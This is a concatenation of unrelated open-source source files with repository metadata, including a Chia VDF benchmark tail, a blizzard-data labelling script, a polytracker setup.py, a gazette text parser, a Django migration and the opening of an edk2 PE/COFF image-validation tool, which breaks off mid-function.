start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_wesolowski.generate_proof(identity, x, y, iterations, k, L, powers)
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 5)
proof_time = round((time.time() * time_multiplier - start_t) / 5)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_wesolowski.verify_proof(x, y, proof, iterations))
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_nwesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
start_t = time.time() * time_multiplier
for _ in range(20):
iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t) / 20
start_t = time.time() * time_multiplier
start_bench()
for _ in range(20):
result, proof = create_proof_of_time_nwesolowski(discriminant, x, iterations,
discriminant_length, 2, depth=0)
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, proof", 20)
proof_time = round((time.time() * time_multiplier - start_t) / 20)
print(" - Percentage of VDF time:", (((proof_time - vdf_time) / vdf_time) * 100), "%")
start_bench()
for _ in range(20):
assert(check_proof_of_time_nwesolowski(discriminant, x, result + proof, iterations, discriminant_length))
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, verification", 20)
def bench_pietrzak():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
delta = 8
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = proof_pietrzak.cache_indeces_for_count(iterations)
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_pietrzak.generate_proof(x, iterations, delta, y, powers,
identity, generate_r_value, discriminant_length)
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 10)
proof_time = round((time.time() * time_multiplier - start_t) / 10)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_pietrzak.verify_proof(x, y, proof, iterations, delta,
generate_r_value, discriminant_length))
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_main():
bench_classgroup()
bench_discriminant_generation()
bench_vdf_iterations()
bench_wesolowski()
bench_nwesolowski()
bench_pietrzak()
if __name__ == '__main__':
bench_main()
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| 38.602041
| 114
| 0.707639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,752
| 0.330602
|
b19995883a43664eea79cdbbf4ebcc8afcf1f9f2
| 2,415
|
py
|
Python
|
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
ccl_dask_blizzard.py
|
michaelleerilee/CCL-M2BLIZZARD
|
ff936647d69c5e83553b55d84d7b3a0636290c77
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from load_for_ccl_inputs import load_for_ccl_inputs
from ccl_marker_stack import ccl_dask
base = '/home/mrilee/nobackup/tmp/others/'
fnames = None
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz']
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz']
if True:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz'
,'ccl-inputs-globe-122784+23.csv.gz'
,'ccl-inputs-globe-122808+23.csv.gz'
,'ccl-inputs-globe-122832+23.csv.gz'
,'ccl-inputs-globe-122856+23.csv.gz'
,'ccl-inputs-globe-122880+23.csv.gz'
,'ccl-inputs-globe-122904+23.csv.gz']
file_fpnames = [base+fname for fname in fnames]
print 'file_fpnames: ',file_fpnames
# quit()
###########################################################################
# Load
# precsno_arr, visibility_arr = load_for_ccl_inputs(file_name)
# For extinction, 1/visibility.
thresh_mnmx = (1.0e-3,1.0)
# The calculation
if True:
ccl_dask_object = ccl_dask()
ccl_dask_object.load_data_segments_with_loader(load_for_ccl_inputs,file_fpnames,[('visibility_i',np.nan,np.float)])
# Diagnostics
if False:
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
print 'execute'
ccl_dask_object.data_segs[0].result()
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
if True:
ccl_dask_object.make_stacks(thresh_mnmx)
ccl_dask_object.shift_labels()
ccl_dask_object.make_translations()
ccl_dask_object.apply_translations()
if False:
print 'ccl_dask_object.data_segs[0].results()[0]\n'\
,ccl_dask_object.data_segs[0].result()[0]
if True:
np.set_printoptions(threshold=5000,linewidth=600)
print 'ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]\n'\
,ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]
np.set_printoptions(threshold=1000,linewidth=75)
ccl_dask_object.close()
# Note, if we have to do the 3-hour blizzard calculation w/o CCL, then we can monkey with the load_data_segments to
# have files loaded onto separate cluster nodes, like ghost cells. Alternatively, we can Dask it by client.submitting
# tasks with dependencies on those two adjacent futures.
| 30.56962
| 119
| 0.670807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,127
| 0.466667
|
b19b15001ce2daedc7edc47219f748a11fbd096b
| 3,108
|
py
|
Python
|
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | 1
|
2020-09-01T15:58:13.000Z
|
2021-01-18T16:24:56.000Z
|
setup.py
|
RiS3-Lab/polytracker
|
2ea047738717ff0c22e3b157934667c9ed84fa6f
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
import sys
from setuptools import setup, find_packages
from typing import Optional, Tuple
SETUP_DIR = os.path.dirname(os.path.realpath(__file__))
POLYTRACKER_HEADER = os.path.join(SETUP_DIR, 'polytracker', 'include', 'polytracker', 'polytracker.h')
if not os.path.exists(POLYTRACKER_HEADER):
sys.stderr.write(f"Error loading polytracker.h!\nIt was expected to be here:\n{POLYTRACKER_HEADER}\n\n")
exit(1)
def polytracker_version() -> Tuple[int, int, int, Optional[str]]:
version_parts = {}
with open(POLYTRACKER_HEADER, 'r') as f:
for i, line in enumerate(f):
m = re.match(r"\s*#define\s+POLYTRACKER_VERSION_([A-Za-z_0-9]+)\s+([^\s]+)\s*$", line)
if m:
if m[1] not in ('MAJOR', 'MINOR', 'REVISION', 'SUFFIX'):
sys.stderr.write(f"Warning: Ignoring unexpected #define for \"POLYTRACKER_VERSION_{m[1]}\" on line "
f"{i + 1} of {POLYTRACKER_HEADER}\n")
else:
version_parts[m[1]] = m[2]
for required_part in ('MAJOR', 'MINOR', 'REVISION'):
if required_part not in version_parts:
sys.stderr.write(
f"Error: #define POLYTRACKER_VERSION_{required_part} not found in {POLYTRACKER_HEADER}\n\n")
sys.exit(1)
try:
version_parts[required_part] = int(version_parts[required_part])
except ValueError:
sys.stderr.write(
f"Error: POLYTRACKER_VERSION_{required_part} in {POLYTRACKER_HEADER} is not an integer!\n\n")
sys.exit(1)
suffix = version_parts.get('SUFFIX', None)
if suffix is not None:
suffix = suffix.strip()
if suffix.startswith('"') and suffix.endswith('"'):
suffix = suffix[1:-1]
return version_parts['MAJOR'], version_parts['MINOR'], version_parts['REVISION'], suffix
def polytracker_version_string() -> str:
*primary, suffix = polytracker_version()
primary = map(str, primary)
if suffix is None:
return '.'.join(primary)
else:
return f"{'.'.join(primary)}{suffix}"
setup(
name='polytracker',
description='API and Library for operating and interacting with PolyTracker',
url='https://github.com/trailofbits/polytracker',
author='Trail of Bits',
version=polytracker_version_string(),
packages=find_packages(),
python_requires='>=3.7',
install_requires=[
'graphviz',
'matplotlib',
'networkx',
'pygraphviz',
'pydot',
'tqdm',
'typing_extensions'
],
extras_require={
"dev": ["black", "mypy", "pytest"]
},
entry_points={
'console_scripts': [
'polyprocess = polytracker.polyprocess.__main__:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Utilities'
]
)
| 35.318182
| 120
| 0.604247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,161
| 0.373552
|
b19b3f7c4a68fc939bc0e963cc37d4583121c7aa
| 111
|
py
|
Python
|
Game22/modules/online/__init__.py
|
ttkaixin1998/pikachupythongames
|
609a3a5a2be3f5a187c332c7980bb5bb14548f02
|
[
"MIT"
] | 4,013
|
2018-06-16T08:00:02.000Z
|
2022-03-30T11:48:14.000Z
|
Game22/modules/online/__init__.py
|
pigbearcat/Games
|
b8c47ef1bcce9a9db3f3730c162e6e8e08b508a2
|
[
"MIT"
] | 22
|
2018-10-18T00:15:50.000Z
|
2022-01-13T08:16:15.000Z
|
Game22/modules/online/__init__.py
|
pigbearcat/Games
|
b8c47ef1bcce9a9db3f3730c162e6e8e08b508a2
|
[
"MIT"
] | 2,172
|
2018-07-20T04:03:14.000Z
|
2022-03-31T14:18:29.000Z
|
'''初始化'''
from .server import gobangSever
from .client import gobangClient
from .playOnline import playOnlineUI
| 27.75
| 36
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.128205
|
b19b4f05269a9c0a51ba854a6b3f0bd1816a6911
| 9,317
|
py
|
Python
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | 2
|
2020-10-04T19:45:45.000Z
|
2020-10-28T20:21:08.000Z
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | 6
|
2020-09-25T14:31:12.000Z
|
2020-09-28T13:37:37.000Z
|
gazette_processor/gazette.py
|
GabrielTrettel/DiariesProcessor
|
817b4d8d1bbf0fe88b315b159e949fe49a2324f7
|
[
"MIT"
] | null | null | null |
import os,sys, re
from math import ceil, floor
class Gazette:
"""
Loads and parses municipal gazettes.
Attributes:
file_path: The string path to a gazette.
file: The string containing a gazette's content.
city: A string for the city (or cities) of the gazette.
date: A string for the date of the gazette.
minimum_spacing_between_cols: An integer for minimum spacingbetween columns. Defaults to 1.
min_break_ratio: A float for min_break_ratio. Defaults to 0.75.
max_allowed_cols: An int for the maximum number of columns allowed per page.
split_re: A regex for splitting
pages: A list of pages, each page is a list of lines.
cols_dividers: ?
pages_avg_col: ?
total_avg_col: ?
"""
def __init__(self, file_path:str, city:str, date:str):
"""Inits Gazette with a path, a city and a date."""
self.file = self.load_file(file_path)
self.city = city
self.date = date
self.minimum_spacing_between_cols = 1
self.min_break_ratio = 0.75
self.max_allowed_cols = 5
self.pages = self.get_list_of_pages()
self.linear_text = ""
self.cols_dividers = [self.vertical_lines_finder(x) for x in self.pages]
self.pages_avg_col = [len(x)+1 for x in self.cols_dividers]
# print(self.pages_avg_col)
if self.pages_avg_col:
self.total_avg_col = sum(self.pages_avg_col) / len(self.pages_avg_col)
else:
self.total_avg_col = 0
self.split_cols()
print(self.total_avg_col)
# print(self.linear_text)
def get_list_of_pages(self, page_break='\014'):
"""
Uses file string in self.file and converts it to a list of lists.
Args:
page_break (str): A string used to delimit page separation
in the target document.
Returns:
list: A list of pages, each page is a list of lines.
"""
pages = []
page_buffer = []
for line in self.file:
if page_break not in line:
page_buffer.append(line)
else:
full_page = page_buffer
pages.append(full_page)
page_buffer = self.reset_buffer(line, page_break)
# Add last page
if len(page_buffer) > 0:
pages.append(page_buffer)
return pages
def reset_buffer(self, line, page_break):
return [line.strip(page_break)]
def split_cols(self):
"""
Splits columns of document into a linear layout
"""
column_dividers = self.cols_dividers
average_columns_per_page = self.pages_avg_col
for page_index, page in enumerate(self.pages):
page_column_dividers = column_dividers[page_index]
page_average_columns = average_columns_per_page[page_index]
page_n_of_columns = len(page_column_dividers)
if self.test_if_page_is_not_splittable(page_average_columns, page_column_dividers, page_n_of_columns):
page_add_to_linear_text = str("".join(page)) + '\014'
self.linear_text += page_add_to_linear_text
continue
page_lines_in_one_column = self.get_lines_in_one_column(page, page_column_dividers)
self.linear_text += self.lines_to_text(page_lines_in_one_column)
def get_lines_in_one_column(self, page, page_column_dividers):
"""
Args
page: A list of strings, and each string is a line in the page.
page_column_dividers: A list of ints that were selected as column dividers.
Returns: A list of strings, and each string is a line in the new page.
"""
longest_line_len = max(len(line) for line in page)
page_column_dividers.append((longest_line_len,0))
lines_to_return = []
for line in page:
column_beginning = 0
current_line = []
line_size = len(line)
for column_divider, _ in page_column_dividers:
if line_size > column_divider and line[column_divider] != ' ':
single_column = [line]
lines_to_return.append(single_column)
column_beginning = -1
break
current_column = line[column_beginning:column_divider]
current_line.append(current_column)
column_beginning = column_divider
lines_to_return.append(current_line)
return lines_to_return
def test_if_page_is_not_splittable(self, page_average_columns, page_column_dividers, page_n_of_columns):
"""
Args
page_average_columns: TODO
page_column_dividers: TODO
page_n_of_columns: TODO
Returns: boolean
"""
average_columns_in_total = self.total_avg_col
maximum_of_columns_allowed = self.max_allowed_cols
too_many_columns = page_n_of_columns >= maximum_of_columns_allowed
no_dividers = page_column_dividers == []
threshold = 1.2
more_pages_than_average = page_average_columns >= (threshold * average_columns_in_total)
min_columns = 2
too_few_columns = page_average_columns < min_columns
result = more_pages_than_average or \
too_few_columns or \
too_many_columns or \
no_dividers
return result
def lines_to_text(self, lines):
max_cols = max(map(lambda x: len(x), lines))
txt = ""
for col_i in range(max_cols):
page_has_content = False
for line in lines:
if len(line) > col_i:
if line[col_i] != '' and line[col_i].strip() != '':
txt += "".join(line[col_i].strip('\n')) + '\n'
page_has_content = True
if lines != [] and page_has_content:
txt += "\014\n"
return txt[:-1]
def vertical_lines_finder(self, page):
max_line_size = max(len(line) for line in page)
vertical_lines = self.get_contiguous_space_heights(max_line_size, page)
candidate_breakpoints = self.remove_contiguous_vertical_lines(vertical_lines, max_line_size)
return candidate_breakpoints
def remove_contiguous_vertical_lines(self, vertical_lines, max_line_size):
if vertical_lines == []:
return []
candidate_breakpoints = [vertical_lines[0]]
col_ctd = 1
while col_ctd < max_line_size and col_ctd < len(vertical_lines):
if self.columns_have_minimum_distance(col_ctd, candidate_breakpoints, vertical_lines):
if vertical_lines[col_ctd] not in candidate_breakpoints:
candidate_breakpoints.append(vertical_lines[col_ctd])
col_ctd +=1
return candidate_breakpoints
def columns_have_minimum_distance(self, col_ctd, candidate_breakpoints, vertical_lines, distance=20):
return abs(candidate_breakpoints[-1][0] - vertical_lines[col_ctd][0]) >= distance
def get_contiguous_space_heights(self, max_line_size, page):
contiguous_space_heights = []
left_delimiter = floor(0.2 * max_line_size)
rigth_delimiter = floor(0.8 * max_line_size)
parsing_window = range(rigth_delimiter, left_delimiter, -1)
for col_idx in parsing_window:
ctd = 1
max_val = 0
for line_idx, line in enumerate(page):
max_val = max(max_val, ctd)
if len(line) <= col_idx:
ctd += 1
else:
if self.col_offset_is_only_spaces(page, line_idx, col_idx):
ctd += 1
else:
ctd = 1
break_ratio = round(max_val/len(page), 2)
if break_ratio > self.min_break_ratio:
contiguous_space_heights.append((col_idx, break_ratio))
contiguous_space_heights = sorted(contiguous_space_heights, key=lambda x: x[1], reverse=True)
return contiguous_space_heights
def get_item_from_list(self, line, col_idx, default=' '):
"""
Returns an list item if it exists, or ´default´, otherwise
"""
try:
return line[col_idx]
except:
return default
def col_offset_is_only_spaces(self, page, line_idx, col_idx, offset=6):
page_slice = page[line_idx : line_idx+offset]
col_slice = [self.get_item_from_list(line, col_idx) for line in page_slice]
return all(i==' ' for i in col_slice)
@staticmethod
def load_file(path):
lines = []
with open(path, 'r') as f:
lines = f.readlines()
return lines
if __name__ == "__main__":
input_f = sys.argv[1]
output_f = sys.argv[2]
# g = Gazette(input_f, "", "")
# g.__split_cols()
# print(g.linear_text)
for file in os.listdir(input_f):
g = Gazette(input_f + '/' + file,"", "")
print(f"Parsing {file}")
with open( output_f + "/" + file, 'w') as f:
f.write(g.linear_text)
| 30.152104
| 114
| 0.605452
| 8,886
| 0.953536
| 0
| 0
| 148
| 0.015882
| 0
| 0
| 1,919
| 0.205923
|
b19b6144712313556ed4af7f1913f9e90750f30c
| 1,065
|
py
|
Python
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 1
|
2021-01-19T00:48:10.000Z
|
2021-01-19T00:48:10.000Z
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 17
|
2020-01-23T05:51:18.000Z
|
2020-06-16T02:33:41.000Z
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 1
|
2020-08-06T02:10:58.000Z
|
2020-08-06T02:10:58.000Z
|
# Generated by Django 3.0.2 on 2020-03-03 21:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('PropertyManagers', '0001_initial'),
('Properties', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tenant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=100)),
('lastName', models.CharField(max_length=100)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=20)),
('place', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Properties.Property')),
('pm', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PropertyManagers.PropertyManager')),
],
),
]
| 35.5
| 139
| 0.611268
| 939
| 0.88169
| 0
| 0
| 0
| 0
| 0
| 0
| 225
| 0.211268
|
b19cab2172cb675aff98cad37d3038a9d288244b
| 21,295
|
py
|
Python
|
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
# @file image_validation.py
# This tool allows a user validate an PE/COFF file
# against specific requirements
##
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
from datetime import datetime
import os
from pefile import PE, SECTION_CHARACTERISTICS, MACHINE_TYPE, SUBSYSTEM_TYPE
import logging
import argparse
import sys
from edk2toolext import edk2_logging
########################
# Helper Functions #
########################
def has_characteristic(data, mask):
return ((data & mask) == mask)
def set_bit(data, bit):
return data | (1 << bit)
def clear_bit(data, bit):
return data & ~(1 << bit)
def set_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
dllchar = set_bit(dllchar, 8) # 8th bit is the nx_compat_flag
pe.OPTIONAL_HEADER.DllCharacteristics = dllchar
return pe
def get_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
if has_characteristic(dllchar, 256): # 256 (8th bit) is the mask
logging.info('True')
return 1
else:
logging.info('False')
return 0
def clear_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
dllchar = clear_bit(dllchar, 8) # 8th bit is the nx_compat_flag
pe.OPTIONAL_HEADER.DllCharacteristics = dllchar
return pe
def fill_missing_requirements(default, target):
for key in default:
if key not in target:
target[key] = default[key]
return target
class Result:
PASS = '[PASS]'
WARN = '[WARNING]'
SKIP = '[SKIP]'
FAIL = '[FAIL]'
class TestInterface:
def name(self):
"""Returns the name of the test"""
raise NotImplementedError("Must Override Test Interface")
def execute(self, pe, config_data):
"""
Executes the test
@param pe: The parser pefile
@param config_data: Configuration data for the specific target machine
and profile
"""
raise NotImplementedError("Must Override Test Interface")
class TestManager(object):
def __init__(self, config_data=None):
self.tests = []
if config_data:
self.config_data = config_data
else:
self.config_data = {
"TARGET_ARCH": {
"X64": "IMAGE_FILE_MACHINE_AMD64",
"IA32": "IMAGE_FILE_MACHINE_I386",
"AARCH64": "IMAGE_FILE_MACHINE_ARM64",
"ARM": "IMAGE_FILE_MACHINE_ARM"
},
"IMAGE_FILE_MACHINE_AMD64": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 4096
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
]
},
"DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER"
"IMAGE_SUBSYSTEM_EFI_ROM"
]
},
},
"IMAGE_FILE_MACHINE_ARM": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT_LOGIC_SEP": "OR",
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
},
{
"COMPARISON": "==",
"VALUE": 32
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]
},
"DXE_DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]},
"PEI": {
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 32
}
]
}
},
"IMAGE_FILE_MACHINE_ARM64": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT_LOGIC_SEP": "OR",
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
},
{
"COMPARISON": "==",
"VALUE": 32
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]
},
"DXE_DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]},
"PEI": {
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 32
}
]
}
},
"IMAGE_FILE_MACHINE_I386": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 4096
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
]
},
"DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER"
"IMAGE_SUBSYSTEM_EFI_ROM"
]
},
"PEI": {}
}
}
def add_test(self, test):
"""
Adds a test to the test manager. Will be executed in the order added
@param test: [Test(TestInterface)] A class that inherits and overrides
the TestInterface class
"""
self.tests.append(test)
def add_tests(self, tests):
"""
Adds multiple test to the test manager. Tests will be executed in the
order added.
@param test: [List[Test(TestInterface)]] A list of classes that
inherits and overrides the TestInterface class
"""
self.tests.extend(tests)
def run_tests(self, pe, profile="DEFAULT"):
"""
Runs all tests that have been added to the test manager. Tests will be
executed in the order added
@param pe : [PE] The parsed pe
@param target_info: [Dict] A Dict that contains MACHINE_TYPE and
PROFILE information. If MachineType is not present, it will be
pulled from the parsed pe, however the user must provide the Module
Type
@return Result.PASS : All tests passed successfully (including warnings)
@return Result.SKIP : There is no information in the config file for the target and fv file type
@return Result.ERROR: At least one test failed. Error messages can be found in the log
"""
# Catch any invalid profiles
machine_type = MACHINE_TYPE[pe.FILE_HEADER.Machine]
if not self.config_data[machine_type].get(profile):
logging.error(f'Profile type {profile} is invalid. Exiting...')
return Result.FAIL
# Fill any missing configurations for the specific module type with the default
default = self.config_data[machine_type]["DEFAULT"]
target = self.config_data[machine_type][profile]
target_requirements = fill_missing_requirements(default, target)
target_info = {
"MACHINE_TYPE": machine_type,
"PROFILE": profile
}
test_config_data = {
"TARGET_INFO": target_info,
"TARGET_REQUIREMENTS": target_requirements
}
logging.debug(f'Executing tests with settings [{machine_type}][{profile}]')
overall_result = Result.PASS
for test in self.tests:
logging.debug(f'Starting test: [{test.name()}]')
result = test.execute(pe, test_config_data)
# Overall Result can only go lower (Pass -> Warn -> Fail)
if result == Result.PASS:
logging.debug(f'{result}')
elif result == Result.SKIP:
logging.debug(f'{result}: No Requirements for [{machine_type}][{profile}]')
elif overall_result == Result.PASS:
overall_result = result
elif overall_result == Result.WARN and result == Result.FAIL:
overall_result = result
return overall_result
###########################
# TESTS START #
###########################
class TestWriteExecuteFlags(TestInterface):
"""
Test: Section data / code separation verification
Detailed Description:
This test ensures that each section of the binary is not both
write-able and execute-able. Sections can only be one or the other
(or neither).This test is done by iterating over each section and
checking the characteristics label for the Write Mask (0x80000000)
and Execute Mask (0x20000000).
Output:
@Success: Only one (or neither) of the two masks (Write, Execute) are
present
@Skip: Test Skipped per config
@Fail: Both the Write and Execute flags are present
Possible Solution:
Possible Solution:
Update the failed section's characteristics to ensure it is either
Write-able or Read-able, but not both.
"""
def name(self):
return 'Section data / code separation verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
if target_requirements.get("DATA_CODE_SEPARATION", False) is False:
return Result.SKIP
for section in pe.sections:
if (has_characteristic(section.Characteristics, SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_EXECUTE"])
and has_characteristic(section.Characteristics, SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"])):
logging.error(f'[{Result.FAIL}]: Section [{section.Name.decode().strip()}] \
should not be both Write and Execute')
return Result.FAIL
return Result.PASS
class TestSectionAlignment(TestInterface):
"""
Test: Section alignment verification
Detailed Description:
Checks the section alignment of the binary by accessing the optional
header, then the section alignment. This value must meet the
requirements specified in the config file.
Output:
@Success: Image alignment meets the requirement specified in the
config file
@Warn: Image Alignment value is not found in the Optional Header or
set to 0
@Skip: No Alignment requirements specified in the config file
@Fail: Image alignment does not meet the requirements specified in
the config file
Possible Solution:
Update the section alignment of the binary to match the
requirements specified in the config file
"""
def name(self):
return 'Section alignment verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
target_info = config_data["TARGET_INFO"]
alignments = target_requirements.get("ALIGNMENT")
if alignments is None or len(alignments) == 0:
return Result.SKIP
try:
alignment = pe.OPTIONAL_HEADER.SectionAlignment
except:
logging.warning("Section Alignment is not present")
return Result.WARN
if alignment is None or alignment == 0:
return Result.WARN
if len(alignments) > 1:
logical_separator = target_requirements.get("ALIGNMENT_LOGIC_SEP")
if logical_separator is None:
logging.error("Multiple alignment requirements exist, but no logical separator provided")
return Result.FAIL
